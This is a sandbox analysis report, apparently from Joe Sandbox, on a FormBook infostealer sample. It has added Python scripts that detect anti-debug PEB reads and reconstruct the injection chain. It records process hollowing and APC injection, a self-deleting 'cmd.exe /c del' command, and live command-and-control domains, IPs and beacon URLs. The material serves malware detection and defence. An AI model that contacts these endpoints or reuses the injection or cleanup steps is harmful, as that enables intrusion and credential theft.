Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051841E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_05177016 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_051C4015 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_0511A830 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_0510B02A mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 9_2_0512002D mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\OrderKLB210568.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\raserver.exe | Process token adjusted: Debug
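The rows above are the sandbox's disassembly hits for reads of dword ptr fs:[00000030h] inside raserver.exe (process 9). In a 32-bit (here WOW64) process, TEB offset 0x30 holds the pointer to the PEB, so each hit is the opening instruction of a check such as PEB.BeingDebugged (PEB+0x02) or PEB.NtGlobalFlag (PEB+0x68). The scanner below is an added example, not part of this report or of the sandbox: it finds the same instruction encodings in a raw code buffer and tallies them per destination register, the way the rows above are grouped. The buffer SAMPLE is constructed for illustration and the function names are mine.

```python
import re
from dataclasses import dataclass

# x86 (32-bit) encodings of a PEB pointer read through the FS segment override (0x64):
#   64 A1 30 00 00 00       mov eax, dword ptr fs:[00000030h]   (moffs32 form, eax only)
#   64 8B 05 30 00 00 00    mov eax, dword ptr fs:[00000030h]   (ModRM disp32 form)
#   64 8B 0D 30 00 00 00    mov ecx, dword ptr fs:[00000030h]
# In the ModRM form the reg field (bits 3..5) selects the destination register, so
# ModRM takes one of 05, 0D, 15, 1D, 25, 2D, 35, 3D for eax..edi with rm=101 (disp32).
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

PEB_READ = re.compile(
    rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00"
)


@dataclass(frozen=True)
class PebRead:
    offset: int      # byte offset of the instruction inside the scanned buffer
    register: str    # destination register
    encoding: bytes  # raw instruction bytes


def decode(match: re.Match) -> PebRead:
    raw = match.group(0)
    if raw[1] == 0xA1:
        reg = "eax"                       # moffs32 form always targets eax
    else:
        reg = REG32[(raw[2] >> 3) & 0b111]  # ModRM.reg
    return PebRead(match.start(), reg, raw)


def find_peb_reads(code: bytes) -> list[PebRead]:
    """Every fs:[30h] read in the buffer, in address order."""
    return [decode(m) for m in PEB_READ.finditer(code)]


def summarize(code: bytes) -> dict[str, int]:
    """Count of PEB reads per destination register, e.g. {'eax': 2, 'ecx': 1}."""
    counts: dict[str, int] = {}
    for hit in find_peb_reads(code):
        counts[hit.register] = counts.get(hit.register, 0) + 1
    return counts


# Constructed sample (not bytes from the analysed file): a made-up function body
# with three PEB reads in the surrounding shape an anti-debug check usually has.
SAMPLE = (
    b"\x55\x8B\xEC"                          # push ebp; mov ebp, esp
    + b"\x64\xA1\x30\x00\x00\x00"            # mov eax, fs:[30h]            (offset 3)
    + b"\x0F\xB6\x40\x02"                    # movzx eax, byte ptr [eax+2]  (BeingDebugged)
    + b"\x85\xC0\x75\x05"                    # test eax, eax; jnz short +5
    + b"\x64\x8B\x0D\x30\x00\x00\x00"        # mov ecx, fs:[30h]            (offset 17)
    + b"\x8B\x41\x68"                        # mov eax, [ecx+68h]           (NtGlobalFlag)
    + b"\x64\x8B\x05\x30\x00\x00\x00"        # mov eax, fs:[30h], ModRM form (offset 27)
    + b"\x5D\xC3"                            # pop ebp; ret
)

if __name__ == "__main__":
    for hit in find_peb_reads(SAMPLE):
        print(f"+{hit.offset:04x}: mov {hit.register}, dword ptr fs:[00000030h]  {hit.encoding.hex()}")
    print(summarize(SAMPLE))
```

A byte scan of this kind is the cheapest way to reproduce the "reads the PEB" rows from an unpacked dump such as 9.2.raserver.exe.*.unpack; it does not disassemble, so a match inside data or across an instruction boundary is possible and the count is an upper bound, not a verdict.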

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 154.201.212.113 80
Source: C:\Windows\explorer.exe | Network Connect: 45.87.1.159 80
Source: C:\Windows\explorer.exe | Domain query: www.marryobaidanjum.com
Source: C:\Windows\explorer.exe | Network Connect: 74.208.236.54 80
Source: C:\Windows\explorer.exe | Domain query: www.plafon.one
Source: C:\Windows\explorer.exe | Domain query: www.tcheaptvwdmall.com
Source: C:\Windows\explorer.exe | Domain query: www.scgcarriers.com
Source: C:\Windows\explorer.exe | Domain query: www.customtiletables.com
Source: C:\Windows\explorer.exe | Domain query: www.velvetlaceextensions.com
Source: C:\Windows\explorer.exe | Domain query: www.trueandbare.com
Source: C:\Windows\explorer.exe | Network Connect: 162.144.21.92 80
Source: C:\Windows\explorer.exe | Network Connect: 34.215.126.147 80
Source: C:\Windows\explorer.exe | Network Connect: 104.16.13.194 80
Source: C:\Windows\explorer.exe | Network Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exe | Domain query: www.pinnacleautism.com
Source: C:\Windows\explorer.exe | Network Connect: 142.250.180.243 80
Source: C:\Windows\explorer.exe | Domain query: www.jarsofjoybylinathomas.com
Source: C:\Windows\explorer.exe | Domain query: www.astromaritravel.com
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\OrderKLB210568.exe | Section loaded: unknown target: C:\Users\user\Desktop\OrderKLB210568.exe protection: execute and read and write
Source: C:\Users\user\Desktop\OrderKLB210568.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\OrderKLB210568.exe | Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write (2 occurrences)
Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\OrderKLB210568.exe | Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\raserver.exe | Thread register set: target process: 3424
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\OrderKLB210568.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\OrderKLB210568.exe | Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 12B0000
Source: C:\Users\user\Desktop\OrderKLB210568.exe | Process created: C:\Users\user\Desktop\OrderKLB210568.exe 'C:\Users\user\Desktop\OrderKLB210568.exe'
Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\OrderKLB210568.exe'
Source: explorer.exe, 00000004.00000000.697916766.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000004.00000000.669867758.0000000001080000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.923196750.0000000003990000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.669867758.0000000001080000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.923196750.0000000003990000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.669867758.0000000001080000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.923196750.0000000003990000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.669867758.0000000001080000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.923196750.0000000003990000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.686288903.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
Source: C:\Users\user\Desktop\OrderKLB210568.exe | Code function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA
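Read together, the rows under this heading give one injection chain: OrderKLB210568.exe unmaps the original image of raserver.exe at base 12B0000 and maps executable sections into it (process hollowing), maps an executable section into explorer.exe and schedules it with an APC, and from then on the injected explorer.exe performs the C2 traffic while raserver.exe spawns cmd.exe to delete the original sample. The script below is an added example, not part of the report: it reads rows written in the "Source: <process> | <action>: <detail>" form and derives those conclusions. The row text is copied from this section; the "|" column split, the SYSTEM_PROCESSES set and the verdict rules are my own assumptions.

```python
import re
from collections import defaultdict

# Row shape assumed here: "Source: <process path> | <action>: <detail>".
ROW = re.compile(r"^Source:\s*(?P<src>.+?)\s*\|\s*(?P<action>[^:]+):\s*(?P<detail>.*)$")
TARGET_PATH = re.compile(r"target(?: process)?:\s*(?P<target>[A-Za-z]:\\\S+)")
UNMAP = re.compile(r"^(?P<target>[A-Za-z]:\\\S+)\s+base address:\s*(?P<base>[0-9A-Fa-f]+)")

# Assumption: Windows binaries that have no business originating outbound HTTP on
# their own. A network connection from one of them after it was an injection target
# is the "system process connects to network" condition.
SYSTEM_PROCESSES = {"explorer.exe", "raserver.exe", "svchost.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse_rows(text: str) -> list[tuple[str, str, str]]:
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            rows.append((m["src"], m["action"].strip(), m["detail"].strip()))
    return rows


def analyze(text: str) -> dict[str, list[str]]:
    writes = defaultdict(set)     # (source, target) -> memory protections written into target
    apc = set()                   # (source, target) pairs with a queued APC
    unmapped = set()              # (source, target) pairs where the target image was unmapped
    network = defaultdict(list)   # process -> network details
    self_delete = set()
    for src, action, detail in parse_rows(text):
        s = basename(src)
        if action == "Section loaded":
            m = TARGET_PATH.search(detail)
            if m:
                writes[(s, basename(m["target"]))].add(detail.split("protection:")[-1].strip())
        elif action == "Thread APC queued":
            m = TARGET_PATH.search(detail)
            if m:
                apc.add((s, basename(m["target"])))
        elif action == "Section unmapped":
            m = UNMAP.match(detail)
            if m:
                unmapped.add((s, basename(m["target"])))
        elif action in ("Network Connect", "Domain query"):
            network[s].append(detail)
        elif action == "Process created" and re.search(r"cmd\.exe\s+/c\s+del\b", detail, re.I):
            self_delete.add(s)
    injected = {t for _, t in writes} | {t for _, t in apc}
    return {
        # executable memory written into another process
        "rwx_writes": sorted(f"{s} -> {t}" for (s, t), prots in writes.items()
                             if any("execute" in p for p in prots)),
        "apc_injection": sorted(f"{s} -> {t}" for s, t in apc),
        # image unmapped and a section written by the same source: hollowing
        "hollowed": sorted(f"{s} -> {t}" for s, t in unmapped if (s, t) in writes),
        "system_process_network": sorted(p for p in network
                                         if p in SYSTEM_PROCESSES and p in injected),
        "self_delete": sorted(self_delete),
    }


# Rows copied from this section of the report; the "|" column split is ours.
REPORT_ROWS = r"""
Source: C:\Users\user\Desktop\OrderKLB210568.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\OrderKLB210568.exe | Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\OrderKLB210568.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\OrderKLB210568.exe | Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 12B0000
Source: C:\Windows\explorer.exe | Network Connect: 154.201.212.113 80
Source: C:\Windows\explorer.exe | Domain query: www.marryobaidanjum.com
Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\OrderKLB210568.exe'
"""

if __name__ == "__main__":
    for key, value in analyze(REPORT_ROWS).items():
        print(f"{key}: {value}")
```

The "Thread register set: target process: 3424" rows identify the target only by PID, so they are not correlated here; on a live host the same logic would key on PIDs from the process-creation events instead of on image names.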

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.OrderKLB210568.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.OrderKLB210568.exe.22b0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: the same eight memory dumps (type: MEMORY) and six unpacked PE files (type: UNPACKEDPE) listed under Stealing of Sensitive Information

Mitre Att&ck Matrix

Techniques the sandbox mapped for this sample, by tactic. Only cells carrying a signature-count badge are listed; the digits after each technique name are those badges, reproduced as extracted, and the other matrix cells are the blank ATT&CK template.

Initial Access: none mapped
Execution: Native API 1; Shared Modules 1
Persistence: none mapped
Privilege Escalation: Process Injection 512
Defense Evasion: Process Injection 512; Virtualization/Sandbox Evasion 3; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 2; Software Packing 11
Credential Access: Input Capture 1
Discovery: Query Registry 1; Security Software Discovery 131; Virtualization/Sandbox Evasion 3; Process Discovery 2; Remote System Discovery 1; File and Directory Discovery 2; System Information Discovery 13
Lateral Movement: none mapped
Collection: Input Capture 1; Archive Collected Data 1; Clipboard Data 1
Exfiltration: none mapped
Command and Control: Encrypted Channel 1; Ingress Tool Transfer 3; Non-Application Layer Protocol 3; Application Layer Protocol 13
Network Effects: none mapped
Remote Service Effects: none mapped
Impact: System Shutdown/Reboot 1

Behavior Graph

Behavior Graph ID: 433298 | Sample: OrderKLB210568.exe | Start date: 11/06/2021 | Architecture: WINDOWS | Score: 100

The graph is reproduced as its node and edge list.

Start node
• DNS/IP: www.voyagoezy.com
• Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures
• started: OrderKLB210568.exe (graph badge: 20)

OrderKLB210568.exe (first instance)
• dropped: C:\Users\user\AppData\Local\...\System.dll, PE32
• Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
• started: OrderKLB210568.exe (second instance)

OrderKLB210568.exe (second instance)
• Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
• injected: explorer.exe

explorer.exe (injected)
• DNS/IP: trueandbare.com 162.144.21.92, 49767, 80, UNIFIEDLAYER-AS-1US, United States; www.customtiletables.com 154.201.212.113, 49773, 80, POWERLINE-AS-APPOWERLINEDATACENTERHK, Seychelles; 15 other IPs or domains
• Signatures: System process connects to network (likely due to code injection or exploit)
• started: raserver.exe

raserver.exe
• Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
• started: cmd.exe (graph badge: 1)

cmd.exe
• started: conhost.exe


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
OrderKLB210568.exe | 33% | ReversingLabs | Win32.Spyware.Noon
OrderKLB210568.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsq144C.tmp\System.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\nsq144C.tmp\System.dll | 0% | ReversingLabs |

Unpacked PE Files

Source | Detection | Scanner | Label
1.2.OrderKLB210568.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
9.2.raserver.exe.33fcd80.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.OrderKLB210568.exe.22b0000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
9.2.raserver.exe.5607960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.OrderKLB210568.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
1.0.OrderKLB210568.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
1.1.OrderKLB210568.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.0.OrderKLB210568.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.scgcarriers.com/noor/?1bWh=MrymD1JTSi9icjGKk8gDaU+0x7uPJ/DMShO0SAEbIObMq4sdMjmwzvuhTtB1BmEBq3Cn&z6A=SROlIdu0 | 0% | Avira URL Cloud | safe
http://www.pinnacleautism.com/noor/?1bWh=yBBObmCyAJHV9q/laG6R4VeleE6hM9O/9rRknywdqzDMYOPfeqQhGmZFlzULPSD48dad&z6A=SROlIdu0 | 0% | Avira URL Cloud | safe
http://www.customtiletables.com/noor/?1bWh=aLSZaEbZcY+nJL/coxA+SeOeWAYt8B9E/LcznQPuCd+SSEpvsuzJsFlKySIeZ1LxQ2fR&z6A=SROlIdu0 | 0% | Avira URL Cloud | safe
www.brochusuell.com/noor/ | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
https://www.plafon.one/noor/?1bWh=xnNqGXCWkFApROrJz350BdHFb13BnEMQPSq | 0% | Avira URL Cloud | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.trueandbare.com/noor/?1bWh=4rG107LnOcmcuziIBv//fTWAPRyuaqL3ZCNKQGbegtiOA/J/96Y+2s4SPBA+G2lg6sqa&z6A=SROlIdu0 | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.astromaritravel.com/noor/?1bWh=AHmkjMmF5A51F9E2l+bDZjEpvTE04T0IuK3gjYUfTOhZyeiT49VRPb60+qMIaT57BRzI&z6A=SROlIdu0 | 0% | Avira URL Cloud | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.plafon.one/noor/?1bWh=xnNqGXCWkFApROrJz350BdHFb13BnEMQPSq+Heyas7SGX58S4jH7yXEPKWiH2cfubfT5&z6A=SROlIdu0 | 0% | Avira URL Cloud | safe
http://www.velvetlaceextensions.com/noor/?1bWh=HXv2ci8qflo+sTzlFu6p6ayrdzzy8jUJJ1L5hJzxjEzCyp3/Ui7nWA8VYIXOKVKH4kcG&z6A=SROlIdu0 | 0% | Avira URL Cloud | safe
http://www.marryobaidanjum.com/noor/?1bWh=KyjbU3AKX/1ra4+yobi9yViduRe0x0FUVCXAE/BWsKVHYHaI6gSvGLTvxwAp00IgFIet&z6A=SROlIdu0 | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

No domain carried an antivirus detection.

Name | IP | Active | Malicious | Reputation
td-balancer-euw2-6-109.wixdns.net | 35.246.6.109 | true | false | unknown
www.plafon.one | 45.87.1.159 | true | true | unknown
www.pinnacleautism.com | 74.208.236.54 | true | true | unknown
www.scgcarriers.com | 34.215.126.147 | true | true | unknown
trueandbare.com | 162.144.21.92 | true | true | unknown
www.customtiletables.com | 154.201.212.113 | true | true | unknown
ghs.googlehosted.com | 142.250.180.243 | true | false | unknown
target.clickfunnels.com | 104.16.13.194 | true | false | high
www.trueandbare.com | unknown | unknown | true | unknown
www.voyagoezy.com | unknown | unknown | true | unknown
www.marryobaidanjum.com | unknown | unknown | true | unknown
www.tcheaptvwdmall.com | unknown | unknown | true | unknown
www.jarsofjoybylinathomas.com | unknown | unknown | true | unknown
www.velvetlaceextensions.com | unknown | unknown | true | unknown
www.astromaritravel.com | unknown | unknown | true | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.scgcarriers.com/noor/?1bWh=MrymD1JTSi9icjGKk8gDaU+0x7uPJ/DMShO0SAEbIObMq4sdMjmwzvuhTtB1BmEBq3Cn&z6A=SROlIdu0 | true | Avira URL Cloud: safe | unknown
http://www.pinnacleautism.com/noor/?1bWh=yBBObmCyAJHV9q/laG6R4VeleE6hM9O/9rRknywdqzDMYOPfeqQhGmZFlzULPSD48dad&z6A=SROlIdu0 | true | Avira URL Cloud: safe | unknown
http://www.customtiletables.com/noor/?1bWh=aLSZaEbZcY+nJL/coxA+SeOeWAYt8B9E/LcznQPuCd+SSEpvsuzJsFlKySIeZ1LxQ2fR&z6A=SROlIdu0 | true | Avira URL Cloud: safe | unknown
www.brochusuell.com/noor/ | true | Avira URL Cloud: safe | low
http://www.trueandbare.com/noor/?1bWh=4rG107LnOcmcuziIBv//fTWAPRyuaqL3ZCNKQGbegtiOA/J/96Y+2s4SPBA+G2lg6sqa&z6A=SROlIdu0 | true | Avira URL Cloud: safe | unknown
http://www.astromaritravel.com/noor/?1bWh=AHmkjMmF5A51F9E2l+bDZjEpvTE04T0IuK3gjYUfTOhZyeiT49VRPb60+qMIaT57BRzI&z6A=SROlIdu0 | false | Avira URL Cloud: safe | unknown
http://www.plafon.one/noor/?1bWh=xnNqGXCWkFApROrJz350BdHFb13BnEMQPSq+Heyas7SGX58S4jH7yXEPKWiH2cfubfT5&z6A=SROlIdu0 | true | Avira URL Cloud: safe | unknown
http://www.velvetlaceextensions.com/noor/?1bWh=HXv2ci8qflo+sTzlFu6p6ayrdzzy8jUJJ1L5hJzxjEzCyp3/Ui7nWA8VYIXOKVKH4kcG&z6A=SROlIdu0 | false | Avira URL Cloud: safe | unknown
http://www.marryobaidanjum.com/noor/?1bWh=KyjbU3AKX/1ra4+yobi9yViduRe0x0FUVCXAE/BWsKVHYHaI6gSvGLTvxwAp00IgFIet&z6A=SROlIdu0 | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | OrderKLB210568.exe | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.plafon.one/noor/?1bWh=xnNqGXCWkFApROrJz350BdHFb13BnEMQPSq | raserver.exe, 00000009.00000002.923694061.0000000005782000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://fontfabrik.com | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_Error | OrderKLB210568.exe | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.%s.comPA | explorer.exe, 00000004.00000000.670973820.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://www.fonts.com | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
162.144.21.92 | trueandbare.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
154.201.212.113 | www.customtiletables.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
45.87.1.159 | www.plafon.one | Netherlands | 204601 | ON-LINE-DATAServerlocation-NetherlandsDrontenNL | true
34.215.126.147 | www.scgcarriers.com | United States | 16509 | AMAZON-02US | true
104.16.13.194 | target.clickfunnels.com | United States | 13335 | CLOUDFLARENETUS | false
35.246.6.109 | td-balancer-euw2-6-109.wixdns.net | United States | 15169 | GOOGLEUS | false
74.208.236.54 | www.pinnacleautism.com | United States | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
142.250.180.243 | ghs.googlehosted.com | United States | 15169 | GOOGLEUS | false

                                                                General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 433298
Start date: 11.06.2021
Start time: 15:41:15
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 27s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: OrderKLB210568.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/4@15/8
EGA Information: Failed
                                                                HDC Information:
                                                                • Successful, ratio: 33.4% (good quality ratio 31.3%)
                                                                • Quality average: 78.1%
                                                                • Quality standard deviation: 28.8%
                                                                HCA Information:
                                                                • Successful, ratio: 90%
                                                                • Number of executed functions: 0
                                                                • Number of non-executed functions: 0
                                                                Cookbook Comments:
                                                                • Adjust boot time
                                                                • Enable AMSI
                                                                • Found application associated with file extension: .exe
                                                                Warnings:
